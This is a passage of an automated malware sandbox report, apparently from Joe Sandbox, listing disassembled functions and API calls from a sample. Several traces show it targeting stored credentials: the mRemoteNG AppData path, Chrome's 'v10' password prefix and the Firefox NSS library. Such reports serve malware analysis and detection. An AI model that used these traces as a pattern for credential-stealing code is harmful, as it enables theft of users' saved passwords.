DeleteCriticalSection.KERNEL32(?,?,?,?,6BB50948,00000000), ref: 6BB48BAC
free.MOZGLUE(?,?,?,?,?,6BB50948,00000000), ref: 6BB48BB8

Memory Dump Source

Source File: 00000001.00000002.2187866101.000000006BAB1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6BAB0000, based on PE: true

Associated: 00000001.00000002.2187844571.000000006BAB0000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000001.00000002.2188024123.000000006BC4F000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000001.00000002.2188066570.000000006BC8E000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000001.00000002.2188085985.000000006BC8F000.00000008.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000001.00000002.2188104178.000000006BC90000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000001.00000002.2188121969.000000006BC95000.00000002.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6bab0000_u5mc.jbxd

Similarity

API ID: CriticalSection$ArenaDeleteEnterFinishPoolUnlockValuefree
String ID:
API String ID: 1456478736-0
Opcode ID: 82448dee3ef315827436d904a542d4efbb47e1123578e98372401b3d1e84c512
Instruction ID: 83f52d8d4a00c53b17d8462ee586c29f4998fa3fcf9918c7d929fa586ae37285
Opcode Fuzzy Hash: 82448dee3ef315827436d904a542d4efbb47e1123578e98372401b3d1e84c512
Instruction Fuzzy Hash: 1A115AB1504A459FDB00BF78D48A17EBBF4FF06254F014A69D8C587204EB38E595CBD2

Uniqueness

Uniqueness Score: -1.00%

Function 6BB4AB10 Relevance: 9.0, APIs: 6, Instructions: 49COMMON

Download Yara Rule

APIs

DeleteCriticalSection.KERNEL32(D958E852,6BB51397,5B5F5EC0,?,?,6BB4B1EE,2404110F,?,?), ref: 6BB4AB3C
free.MOZGLUE(D958E836,?,6BB4B1EE,2404110F,?,?), ref: 6BB4AB49
DeleteCriticalSection.KERNEL32(5D5E6BD4), ref: 6BB4AB5C
free.MOZGLUE(5D5E6BC8), ref: 6BB4AB63
DeleteCriticalSection.KERNEL32(0148B821,?,2404110F,?,?), ref: 6BB4AB6F
free.MOZGLUE(0148B805,?,2404110F,?,?), ref: 6BB4AB76

Part of subcall function 6BB7F820: free.MOZGLUE(6A1B7500,2404110F,?,?), ref: 6BB7F854
Part of subcall function 6BB7F820: free.MOZGLUE(FFD3F9E8,2404110F,?,?), ref: 6BB7F868
Part of subcall function 6BB7F820: DeleteCriticalSection.KERNEL32(04C4841B,2404110F,?,?), ref: 6BB7F882
Part of subcall function 6BB7F820: free.MOZGLUE(04C483FF,?,?), ref: 6BB7F889
Part of subcall function 6BB7F820: DeleteCriticalSection.KERNEL32(CCCCCCDF,2404110F,?,?), ref: 6BB7F8A4
Part of subcall function 6BB7F820: free.MOZGLUE(CCCCCCC3,?,?), ref: 6BB7F8AB
Part of subcall function 6BB7F820: DeleteCriticalSection.KERNEL32(280F1108,2404110F,?,?), ref: 6BB7F8C9
Part of subcall function 6BB7F820: free.MOZGLUE(280F10EC,?,?), ref: 6BB7F8D0

Memory Dump Source

Source File: 00000001.00000002.2187866101.000000006BAB1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6BAB0000, based on PE: true

Associated: 00000001.00000002.2187844571.000000006BAB0000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000001.00000002.2188024123.000000006BC4F000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000001.00000002.2188066570.000000006BC8E000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000001.00000002.2188085985.000000006BC8F000.00000008.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000001.00000002.2188104178.000000006BC90000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000001.00000002.2188121969.000000006BC95000.00000002.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6bab0000_u5mc.jbxd

Similarity

API ID: free$CriticalDeleteSection
String ID:
API String ID: 682657753-0
Opcode ID: 020e8d2ebff98461e3cf365b2e0006411c71438b2f99b443c2852e161934e29d
Instruction ID: fd80aa1d470b9bf695bb6ed97fb03bf2287e380cd72926ccd6f2fb3ac9a45981
Opcode Fuzzy Hash: 020e8d2ebff98461e3cf365b2e0006411c71438b2f99b443c2852e161934e29d
Instruction Fuzzy Hash: 3601B1B2800A55AFCA019FB4EC8485BB778FB467353040639E91983610E73AF556EBE1

Uniqueness

Uniqueness Score: -1.00%

Function 00415960 Relevance: 9.0, APIs: 4, Strings: 2, Instructions: 41stringCOMMON

Download Yara Rule

APIs

StrStrA.SHLWAPI(04286868,?,?,?,0040F76C,?,04286868,00000000), ref: 0041596C
lstrcpyn.KERNEL32(C:\Users\user\AppData\Roaming\mRemoteNG\,04286868,04286868,?,0040F76C,?,04286868), ref: 00415990
lstrlen.KERNEL32(?,?,0040F76C,?,04286868), ref: 004159A7
wsprintfA.USER32 ref: 004159C7

Strings

C:\Users\user\AppData\Roaming\mRemoteNG\, xrefs: 0041598B, 004159C0, 004159D0
%s%s, xrefs: 004159B5

Memory Dump Source

Source File: 00000001.00000002.2124203765.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2124203765.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2124203765.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2124203765.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2124203765.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_u5mc.jbxd

Yara matches

Similarity

API ID: lstrcpynlstrlenwsprintf
String ID: %s%s$C:\Users\user\AppData\Roaming\mRemoteNG\
API String ID: 1206339513-1027354905
Opcode ID: 145a19e204c32b80f721800f8dc263c6d3553908343d9ba3445ddbc103129e49
Instruction ID: ad4ab28855ecf1822f83189248f4f970b5300654cb1d5d0a0ffaf2e78bbea45f
Opcode Fuzzy Hash: 145a19e204c32b80f721800f8dc263c6d3553908343d9ba3445ddbc103129e49
Instruction Fuzzy Hash: 69015A75510908FFCB14DFA8D948EAE7BB9FF88344F108588F90A9B340CA71AA40CB94

Uniqueness

Uniqueness Score: -1.00%

Function 6BB44B00 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 84memoryCOMMON

Download Yara Rule

APIs

NSS_GetAlgorithmPolicy.NSS3(?,?), ref: 6BB44B66
NSS_GetAlgorithmPolicy.NSS3(?,?), ref: 6BB44B7D
PR_SetError.NSS3(FFFFE0B5,00000000), ref: 6BB44B97
PORT_ZAlloc_Util.NSS3(00000018), ref: 6BB44BB7

Part of subcall function 6BB90D30: calloc.MOZGLUE ref: 6BB90D50
Part of subcall function 6BB90D30: TlsGetValue.KERNEL32 ref: 6BB90D6D

Strings

, xrefs: 6BB44B8A

Memory Dump Source

Source File: 00000001.00000002.2187866101.000000006BAB1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6BAB0000, based on PE: true

Associated: 00000001.00000002.2187844571.000000006BAB0000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000001.00000002.2188024123.000000006BC4F000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000001.00000002.2188066570.000000006BC8E000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000001.00000002.2188085985.000000006BC8F000.00000008.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000001.00000002.2188104178.000000006BC90000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000001.00000002.2188121969.000000006BC95000.00000002.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6bab0000_u5mc.jbxd

Similarity

API ID: AlgorithmPolicy$Alloc_ErrorUtilValuecalloc
String ID:
API String ID: 4087055539-3916222277
Opcode ID: 852586c6aa0bc826589020c6931877296b3b735dc2776bef8f696056fc90cde0
Instruction ID: fb7195e88341deb7895dc120106799adcebcad53c54dfa3586eac90f39292a61
Opcode Fuzzy Hash: 852586c6aa0bc826589020c6931877296b3b735dc2776bef8f696056fc90cde0
Instruction Fuzzy Hash: 65210B71D0028A5BDF108E689C42B6FB7B4FF41318F100165D929962D5EBB49525D6A2

Uniqueness

Uniqueness Score: -1.00%

Function 6BB6CAA0 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 64COMMON

Download Yara Rule

APIs

PR_GetEnvSecure.NSS3(NSS_DISABLE_UNLOAD,6BB4B1EE,D958E836,?,6BB851C5), ref: 6BB6CAFA
PR_UnloadLibrary.NSS3(?,6BB851C5), ref: 6BB6CB09
PR_GetEnvSecure.NSS3(NSS_DISABLE_UNLOAD,6BB4B1EE,D958E836,?,6BB851C5), ref: 6BB6CB2C
PR_UnloadLibrary.NSS3(6BB851C5), ref: 6BB6CB3E

Strings

NSS_DISABLE_UNLOAD, xrefs: 6BB6CAF5, 6BB6CB27

Memory Dump Source

Source File: 00000001.00000002.2187866101.000000006BAB1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6BAB0000, based on PE: true

Associated: 00000001.00000002.2187844571.000000006BAB0000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000001.00000002.2188024123.000000006BC4F000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000001.00000002.2188066570.000000006BC8E000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000001.00000002.2188085985.000000006BC8F000.00000008.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000001.00000002.2188104178.000000006BC90000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000001.00000002.2188121969.000000006BC95000.00000002.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6bab0000_u5mc.jbxd

Similarity

API ID: LibrarySecureUnload
String ID: NSS_DISABLE_UNLOAD
API String ID: 4190191112-1204168554
Opcode ID: 74ba5a29f8ce3f115ed61dd40dc8867c5d2979b063628589aae80237c5576c51
Instruction ID: bcb1adc84fb86bac12df3f45be56bd1f00a48ead13b90684a13b505d7f02972f
Opcode Fuzzy Hash: 74ba5a29f8ce3f115ed61dd40dc8867c5d2979b063628589aae80237c5576c51
Instruction Fuzzy Hash: 3E11EEF1D00A959BEF10EB25D80071AB7B8FB01B88F08413AD408C6140F778EA96CBD2

Uniqueness

Uniqueness Score: -1.00%

Function 6BB4CB60 Relevance: 7.8, APIs: 5, Instructions: 253COMMON

Download Yara Rule

APIs

PR_SetError.NSS3(FFFFE041,00000000,?,?,?,?,00000000,?,00000000,?,6BB557DF,00000000,?,00000002,6BB55840,?), ref: 6BB4CBB5
TlsGetValue.KERNEL32(?,?,?,?,?,?,00000000,?,00000000,?,6BB557DF,00000000,?,00000002,6BB55840,?), ref: 6BB4CC4A
EnterCriticalSection.KERNEL32(0000001C,?,?,?,?,?,?,00000000,?,00000000,?,6BB557DF,00000000,?,00000002,6BB55840), ref: 6BB4CC5E
PR_Unlock.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 6BB4CC98
PR_Unlock.NSS3(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 6BB4CD50

Memory Dump Source

Source File: 00000001.00000002.2187866101.000000006BAB1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6BAB0000, based on PE: true

Associated: 00000001.00000002.2187844571.000000006BAB0000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000001.00000002.2188024123.000000006BC4F000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000001.00000002.2188066570.000000006BC8E000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000001.00000002.2188085985.000000006BC8F000.00000008.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000001.00000002.2188104178.000000006BC90000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000001.00000002.2188121969.000000006BC95000.00000002.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6bab0000_u5mc.jbxd

Similarity

API ID: Unlock$CriticalEnterErrorSectionValue
String ID:
API String ID: 1974170392-0
Opcode ID: da8ed84408eead7a4bb532215133f7e6097d78015711510f1f1b37ada6c71d54
Instruction ID: 6ea05b39232ae0bb3bf999a09274d85900fa555937f18438588df7d344dc20aa
Opcode Fuzzy Hash: da8ed84408eead7a4bb532215133f7e6097d78015711510f1f1b37ada6c71d54
Instruction Fuzzy Hash: 4C91D476E00258AFDB00DFA8EC81A9EBBB5FF49714F040068E819A7315E739E915DBD1

Uniqueness

Uniqueness Score: -1.00%

Function 6BB38B50 Relevance: 7.7, APIs: 5, Instructions: 218COMMON

Download Yara Rule

APIs

CERT_DecodeAVAValue.NSS3 ref: 6BB38B5C
CERT_DecodeAVAValue.NSS3 ref: 6BB38B67

Part of subcall function 6BB38E00: PL_InitArenaPool.NSS3(?,security,00000800,00000008), ref: 6BB38EED
Part of subcall function 6BB38E00: SEC_QuickDERDecodeItem_Util.NSS3(?,?,6BC618D0,?), ref: 6BB38F03
Part of subcall function 6BB38E00: PR_CallOnce.NSS3(6BC92AA4,6BB912D0), ref: 6BB38F19
Part of subcall function 6BB38E00: PL_FreeArenaPool.NSS3(?), ref: 6BB38F2B

SECITEM_CompareItem_Util.NSS3(?,?), ref: 6BB38D5C
SECITEM_ZfreeItem_Util.NSS3(00000000,00000001), ref: 6BB38D6B
SECITEM_ZfreeItem_Util.NSS3(00000000,00000001), ref: 6BB38D76

Memory Dump Source

Source File: 00000001.00000002.2187866101.000000006BAB1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6BAB0000, based on PE: true

Associated: 00000001.00000002.2187844571.000000006BAB0000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000001.00000002.2188024123.000000006BC4F000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000001.00000002.2188066570.000000006BC8E000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000001.00000002.2188085985.000000006BC8F000.00000008.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000001.00000002.2188104178.000000006BC90000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000001.00000002.2188121969.000000006BC95000.00000002.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6bab0000_u5mc.jbxd

Similarity

API ID: Item_Util$Decode$ArenaPoolValueZfree$CallCompareFreeInitOnceQuick
String ID:
API String ID: 185717074-0
Opcode ID: 0b2f8dd38a6241c10cbb34373fa26296834094dbcb1128f17eabedd40295e484
Instruction ID: b835e4039f769aa9fcb5ce440a9f5a7888ed29230769a6b4ff6dad1fb3867361
Opcode Fuzzy Hash: 0b2f8dd38a6241c10cbb34373fa26296834094dbcb1128f17eabedd40295e484
Instruction Fuzzy Hash: 94713671E016798FDB108A588C907AEF7F2EB49321F594269D828E73C1E33D9C01C7A2

Uniqueness

Uniqueness Score: -1.00%

Function 0040F200 Relevance: 7.6, APIs: 5, Instructions: 120stringCOMMON

Download Yara Rule

APIs

strtok_s.MSVCRT ref: 0040F228
strtok_s.MSVCRT ref: 0040F36D

Part of subcall function 00416E20: lstrlen.KERNEL32(00000000,?,?,00412BE0,0041D59B,0041D59A,?,?,004137D6,00000000,?,0427DC48,?,0041D8AC,?,00000000), ref: 00416E2B
Part of subcall function 00416E20: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416E85

Memory Dump Source

Source File: 00000001.00000002.2124203765.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2124203765.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2124203765.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2124203765.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2124203765.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_u5mc.jbxd

Yara matches

Similarity

API ID: strtok_s$lstrcpylstrlen
String ID:
API String ID: 348468850-0
Opcode ID: 89292260d13e06a3ccf44185258d8082ce40877a689944c47bb1047c3bb279de
Instruction ID: 34556820f6e5338ba8e8a845a83fb71131f6fb13afd6d5a2f2d9a2f2ab0dc7f0
Opcode Fuzzy Hash: 89292260d13e06a3ccf44185258d8082ce40877a689944c47bb1047c3bb279de
Instruction Fuzzy Hash: 4F514FB5A04209DFCB18CF54D595AAE7BB6FF48308F10817DE802AB390D734EA95CB95

Uniqueness

Uniqueness Score: -1.00%

Function 6BB84B00 Relevance: 7.6, APIs: 5, Instructions: 119stringCOMMON

Download Yara Rule

APIs

PR_SetError.NSS3(FFFFE09A,00000000,-00000001,00000000,?,?,6BB77B3B,00000000,?,?,00000000), ref: 6BB84BA3

Part of subcall function 6BB88970: TlsGetValue.KERNEL32(?,00000000,6BB361C4,?,6BB35639,00000000), ref: 6BB88991
Part of subcall function 6BB88970: TlsGetValue.KERNEL32(?,?,?,?,?,6BB35639,00000000), ref: 6BB889AD
Part of subcall function 6BB88970: EnterCriticalSection.KERNEL32(?,?,?,?,?,?,6BB35639,00000000), ref: 6BB889C6
Part of subcall function 6BB88970: PR_WaitCondVar.NSS3 ref: 6BB889F7
Part of subcall function 6BB88970: PR_Unlock.NSS3(?,?,?,?,?,?,?,6BB35639,00000000), ref: 6BB88A0C

strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,?,00000000), ref: 6BB84B44
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,?,00000000), ref: 6BB84B7E
SECMOD_DestroyModule.NSS3(00000000), ref: 6BB84C44
free.MOZGLUE(?), ref: 6BB84C54

Memory Dump Source

Source File: 00000001.00000002.2187866101.000000006BAB1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6BAB0000, based on PE: true

Associated: 00000001.00000002.2187844571.000000006BAB0000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000001.00000002.2188024123.000000006BC4F000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000001.00000002.2188066570.000000006BC8E000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000001.00000002.2188085985.000000006BC8F000.00000008.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000001.00000002.2188104178.000000006BC90000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000001.00000002.2188121969.000000006BC95000.00000002.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6bab0000_u5mc.jbxd

Similarity

API ID: Valuestrcmp$CondCriticalDestroyEnterErrorModuleSectionUnlockWaitfree
String ID:
API String ID: 3094473128-0
Opcode ID: 7c9c23d9910067b16642e02c03d077d9224e2f192006b285f349556025e4254c
Instruction ID: f1f8b3b02715b2ab89c2de2e5fa488bd6721d937cbc35148f2e0d2e4b457a97f
Opcode Fuzzy Hash: 7c9c23d9910067b16642e02c03d077d9224e2f192006b285f349556025e4254c
Instruction Fuzzy Hash: 3C41C0B5A002859BEB109F28EC4171EB3BDEF40718F144164EC29AB320E779FA14CBD2

Uniqueness

Uniqueness Score: -1.00%

Function 004097F0 Relevance: 7.6, APIs: 3, Strings: 2, Instructions: 115memoryCOMMON

Download Yara Rule

APIs

memcmp.MSVCRT ref: 0040980B
memset.MSVCRT ref: 0040983E
LocalAlloc.KERNEL32(00000040,?), ref: 0040988E

Part of subcall function 00416D40: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416D88

Part of subcall function 00416E20: lstrlen.KERNEL32(00000000,?,?,00412BE0,0041D59B,0041D59A,?,?,004137D6,00000000,?,0427DC48,?,0041D8AC,?,00000000), ref: 00416E2B
Part of subcall function 00416E20: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416E85

Part of subcall function 00416DA0: lstrcpy.KERNEL32(?,00000000), ref: 00416DE6

Strings

@, xrefs: 00409847
v10, xrefs: 00409802

Memory Dump Source

Source File: 00000001.00000002.2124203765.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2124203765.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2124203765.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2124203765.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2124203765.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_u5mc.jbxd

Yara matches

Similarity

API ID: lstrcpy$AllocLocallstrlenmemcmpmemset
String ID: @$v10
API String ID: 1400469952-24753345
Opcode ID: e71f3abce87f5488d7e3c7f729cda8505d52d5c20a578ee7e88b686cde8dd440
Instruction ID: 87859f0eaa1cac66c0422607c8296a2f5b7cfd88fdb957a476e5adb471fb7cf1
Opcode Fuzzy Hash: e71f3abce87f5488d7e3c7f729cda8505d52d5c20a578ee7e88b686cde8dd440
Instruction Fuzzy Hash: 00414EB0A00208EBDB04DFA5DC55FDE7B75BF44304F108119F909AB295DB78AE85CB98

Uniqueness

Uniqueness Score: -1.00%

Function 6BBA4BB0 Relevance: 7.6, APIs: 5, Instructions: 80memoryCOMMON

Download Yara Rule

APIs

PORT_NewArena_Util.NSS3(00000400,C083F089), ref: 6BBA4BDD

Part of subcall function 6BB90FF0: calloc.MOZGLUE(00000001,00000024,00000000,?,?,6BB387ED,00000800,6BB2EF74,00000000), ref: 6BB91000
Part of subcall function 6BB90FF0: PR_NewLock.NSS3(?,00000800,6BB2EF74,00000000), ref: 6BB91016
Part of subcall function 6BB90FF0: PL_InitArenaPool.NSS3(00000000,security,6BB387ED,00000008,?,00000800,6BB2EF74,00000000), ref: 6BB9102B

PORT_ArenaAlloc_Util.NSS3(00000000,00000001,?,C083F089), ref: 6BBA4C03

Part of subcall function 6BB910C0: TlsGetValue.KERNEL32(?,6BB38802,00000000,00000008,?,6BB2EF74,00000000), ref: 6BB910F3
Part of subcall function 6BB910C0: EnterCriticalSection.KERNEL32(?,?,6BB38802,00000000,00000008,?,6BB2EF74,00000000), ref: 6BB9110C
Part of subcall function 6BB910C0: PL_ArenaAllocate.NSS3(?,?,?,6BB38802,00000000,00000008,?,6BB2EF74,00000000), ref: 6BB91141
Part of subcall function 6BB910C0: PR_Unlock.NSS3(?,?,?,6BB38802,00000000,00000008,?,6BB2EF74,00000000), ref: 6BB91182
Part of subcall function 6BB910C0: TlsGetValue.KERNEL32(?,6BB38802,00000000,00000008,?,6BB2EF74,00000000), ref: 6BB9119C

memset.VCRUNTIME140(00000000,00000000,00000001,?,?,?,C083F089), ref: 6BBA4C15
SEC_ASN1EncodeItem_Util.NSS3(?,00000000,?,?,?,?,?,?,?,?,C083F089), ref: 6BBA4C3E

Part of subcall function 6BB8F080: PORT_FreeArena_Util.NSS3(00000000,00000000,?,?,?,?,?,?,?,?,?), ref: 6BB8F0C8
Part of subcall function 6BB8F080: PORT_FreeArena_Util.NSS3(00000000,00000000), ref: 6BB8F122

PORT_FreeArena_Util.NSS3(?,00000000,?,?,?,C083F089), ref: 6BBA4C85

Memory Dump Source

Source File: 00000001.00000002.2187866101.000000006BAB1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6BAB0000, based on PE: true

Associated: 00000001.00000002.2187844571.000000006BAB0000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000001.00000002.2188024123.000000006BC4F000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000001.00000002.2188066570.000000006BC8E000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000001.00000002.2188085985.000000006BC8F000.00000008.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000001.00000002.2188104178.000000006BC90000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000001.00000002.2188121969.000000006BC95000.00000002.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6bab0000_u5mc.jbxd

Similarity

API ID: Util$Arena_$ArenaFree$Value$Alloc_AllocateCriticalEncodeEnterInitItem_LockPoolSectionUnlockcallocmemset
String ID:
API String ID: 227267669-0
Opcode ID: 3af2dbefe3a7f54cc2ebbeba44de2ae14a54004df24e6ab5adc30b1100ec3cde
Instruction ID: ff897e5ff4c44c3f58b6fb7f2c6dbf824d6cb1433293981fea7fb948d5887acf
Opcode Fuzzy Hash: 3af2dbefe3a7f54cc2ebbeba44de2ae14a54004df24e6ab5adc30b1100ec3cde
Instruction Fuzzy Hash: 912102B2E042517BFB101E65AC42FAB369CDF42368F040134ED2C97291FBBAE91086A1

Uniqueness

Uniqueness Score: -1.00%

Function 6BBA03A0 Relevance: 7.6, APIs: 5, Instructions: 68memoryCOMMON

Download Yara Rule

APIs

PORT_ArenaMark_Util.NSS3(?,00000000,?,00000000,?,6BBA0606,00000000,?,?,?,?,00000000,00000000), ref: 6BBA03AA

Part of subcall function 6BB914C0: TlsGetValue.KERNEL32 ref: 6BB914E0
Part of subcall function 6BB914C0: EnterCriticalSection.KERNEL32 ref: 6BB914F5
Part of subcall function 6BB914C0: PR_Unlock.NSS3 ref: 6BB9150D

PORT_ArenaAlloc_Util.NSS3(?,00000018,?,?,00000000,00000000), ref: 6BBA03B7

Part of subcall function 6BB910C0: TlsGetValue.KERNEL32(?,6BB38802,00000000,00000008,?,6BB2EF74,00000000), ref: 6BB910F3
Part of subcall function 6BB910C0: EnterCriticalSection.KERNEL32(?,?,6BB38802,00000000,00000008,?,6BB2EF74,00000000), ref: 6BB9110C
Part of subcall function 6BB910C0: PL_ArenaAllocate.NSS3(?,?,?,6BB38802,00000000,00000008,?,6BB2EF74,00000000), ref: 6BB91141
Part of subcall function 6BB910C0: PR_Unlock.NSS3(?,?,?,6BB38802,00000000,00000008,?,6BB2EF74,00000000), ref: 6BB91182
Part of subcall function 6BB910C0: TlsGetValue.KERNEL32(?,6BB38802,00000000,00000008,?,6BB2EF74,00000000), ref: 6BB9119C

SECOID_FindOIDByTag_Util.NSS3(?,?,?,?,?,00000000,00000000), ref: 6BBA03DD

Part of subcall function 6BB90840: PR_SetError.NSS3(FFFFE08F,00000000), ref: 6BB908B4

SECITEM_CopyItem_Util.NSS3(?,00000000,00000000,?,?,?,?,?,00000000,00000000), ref: 6BBA03EF

Part of subcall function 6BB8FB60: PORT_ArenaAlloc_Util.NSS3(00000000,E0056800,00000000,?,?,6BB88D2D,?,00000000,?), ref: 6BB8FB85
Part of subcall function 6BB8FB60: memcpy.VCRUNTIME140(00000000,6A1BEBC6,E0056800,?), ref: 6BB8FBB1

SECITEM_ArenaDupItem_Util.NSS3(?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 6BBA041B

Memory Dump Source

Source File: 00000001.00000002.2187866101.000000006BAB1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6BAB0000, based on PE: true

Associated: 00000001.00000002.2187844571.000000006BAB0000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000001.00000002.2188024123.000000006BC4F000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000001.00000002.2188066570.000000006BC8E000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000001.00000002.2188085985.000000006BC8F000.00000008.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000001.00000002.2188104178.000000006BC90000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000001.00000002.2188121969.000000006BC95000.00000002.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6bab0000_u5mc.jbxd

Similarity

API ID: Util$Arena$Value$Alloc_CriticalEnterItem_SectionUnlock$AllocateCopyErrorFindMark_Tag_memcpy
String ID:
API String ID: 2504616530-0
Opcode ID: 7bb0833741dec5aa013dceb8a86a34761f22dbaeac30504066c82f1d5959b752
Instruction ID: e3268a54372645f0e6457f2d1af4278ba01e7d0b0b5c350a10679282e4dbe7b9
Opcode Fuzzy Hash: 7bb0833741dec5aa013dceb8a86a34761f22dbaeac30504066c82f1d5959b752
Instruction Fuzzy Hash: 991173A5E082956BFB00AE35AC82B6F37DCEF55148F440075EC05CB241FB69DA1582F6

Uniqueness

Uniqueness Score: -1.00%

Function 004135E0 Relevance: 7.6, APIs: 5, Instructions: 67timeCOMMON

Download Yara Rule

APIs

GetSystemTime.KERNEL32(0041D8AC,?,?,004137D1,00000000,?,0427DC48,?,0041D8AC,?,00000000,?), ref: 0041362C
sscanf.NTDLL ref: 00413659
SystemTimeToFileTime.KERNEL32(0041D8AC,00000000,?,?,?,?,?,?,?,?,?,?,?,0427DC48,?,0041D8AC), ref: 00413672
SystemTimeToFileTime.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?,?,0427DC48,?,0041D8AC), ref: 00413680
ExitProcess.KERNEL32 ref: 0041369A

Memory Dump Source

Source File: 00000001.00000002.2124203765.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2124203765.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2124203765.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2124203765.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
